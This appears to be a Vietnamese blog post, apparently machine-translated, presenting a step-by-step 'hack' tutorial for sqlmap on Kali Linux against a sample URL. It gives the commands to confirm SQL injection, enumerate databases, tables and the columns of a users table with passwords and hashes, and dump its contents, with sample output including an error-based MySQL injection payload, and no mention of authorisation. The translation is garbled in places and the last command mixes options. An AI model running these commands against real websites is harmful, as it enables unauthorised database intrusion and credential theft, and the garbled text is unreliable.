Hướng dẫn hack Sqlmap trên kali linux
Hướng dẫn hack Sqlmap trên kali linux
Sqlmap là một trong những công cụ tự động hóa sql injection phổ biến và mạnh mẽ nhất hiện có. Với một yêu cầu http url dễ bị tổn thương, sqlmap có thể khai thác cơ sở dữ liệu từ xa và làm rất nhiều hack như chiết xuất tên cơ sở dữ liệu, bảng, cột, tất cả các dữ liệu trong các bảng vv Nó thậm chí có thể đọc và ghi các tập tin trên hệ thống tập tin từ xa theo một số các điều kiện. Viết bằng python nó là một trong những công cụ hacking mạnh mẽ nhất hiện có. Sqlmap là Metasploit tiêm sql.
Url dễ bị tổn thương
Cho phép nói rằng đó là một ứng dụng web hoặc trang web có một url trong nó như thế này
http://www.site.com/section.php?id=51
và nó là dễ bị tiêm sql vì các nhà phát triển của trang web đó đã không đúng cách thoát khỏi những tham số id.Điều này có thể được chỉ đơn giản là kiểm tra bằng cách cố gắng để mở url
http://www.site.com/section.php?id=51 '
Chúng tôi chỉ cần thêm một giá duy nhất trong các tham số. Nếu url này ném một lỗi hoặc phản ứng một cách bất ngờ sau đó nó là rõ ràng rằng các cơ sở dữ liệu đã có các báo bất ngờ duy nhất mà các ứng dụng đã không thoát khỏi đúng. Vì vậy, trong trường hợp này này tham số đầu vào "id" là dễ bị tiêm sql.
Hacking với sqlmap
Bây giờ thời gian của mình để chuyển sang sqlmap để hack các url đó. Lệnh sqlmap được chạy từ thiết bị đầu cuối với các thông dịch viên python.
sqlmap -u "http://www.site.com/section.php?id=51"
Trên đây là lệnh đầu tiên và đơn giản nhất để chạy các công cụ sqlmap. Nó sẽ kiểm tra các thông số đầu vào để tìm thấy nếu họ là dễ bị tiêm sql hay không. Đối với sqlmap này sẽ gửi các loại trọng tải sql injection để các tham số đầu vào và kiểm tra đầu ra. Trong quá trình sqlmap cũng có thể xác định các hệ thống từ xa os, tên cơ sở dữ liệu và phiên bản. Dưới đây là làm thế nào các đầu ra có thể trông giống như.
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
Vì vậy, các công cụ sqlmap đã phát hiện hệ điều hành, máy chủ web và cơ sở dữ liệu cùng với thông tin phiên bản. Thậm chí điều này nhiều là khá ấn tượng. Nhưng thời gian của mình để di chuyển trên và xem những gì nhiều hơn là công cụ này có khả năng.
Khám phá cơ sở dữ liệu
Khi sqlmap xác nhận rằng một url từ xa là dễ bị tiêm sql và khai thác được các bước tiếp theo là tìm ra tên của các cơ sở dữ liệu tồn tại trên hệ thống từ xa. Các "--dbs" tùy chọn được sử dụng để có được danh sách cơ sở dữ liệu.
sqlmap -u "http://www.sitemap.com/section.php?id=51" --dbs
Đầu ra có thể là một cái gì đó như thế này
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
Các đầu ra cho thấy các cơ sở dữ liệu hiện có trên hệ thống từ xa.
Tìm bảng trong một CSDL Cụ
Bây giờ thời gian của mình để tìm ra những tồn tại trong bảng cơ sở dữ liệu cụ thể. Cho phép nói cơ sở dữ liệu quan tâm ở đây là 'safecosmetics'
Chỉ huy
sqlmap -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
và đầu ra có thể là một cái gì đó tương tự như này
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables
isnt tuyệt vời này? nó nếu ofcourse. Cho phép nhận được các cột của một bảng cụ thể bây giờ.
Nhận cột của một bảng
Bây giờ chúng ta đã có danh sách các bảng với chúng tôi, nó sẽ là một ý tưởng tốt để có được các cột của một số bảng quan trọng. Cho phép nói rằng bảng là 'người sử dụng và nó có chứa tên người dùng và mật khẩu.
sqlmap -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
Đầu ra có thể là một cái gì đó như thế này
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| email | text |
| hash | varchar(128) |
| id | int(11) |
| name | text |
| password | text |
| permission | tinyint(4) |
| system_allow_only | text |
| system_home | text |
+-------------------+--------------+
Vì vậy, bây giờ các cột có thể thấy rõ. Làm tốt lắm!
Lấy dữ liệu từ một bảng
Bây giờ đến phần thú vị nhất, từ việc khai thác dữ liệu từ bảng. Các lệnh sẽ được
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users -C name --dump-all
Hướng dẫn hack Sqlmap trên kali linux
Reviewed by Unknown
on
00:53
Rating:
Không có nhận xét nào: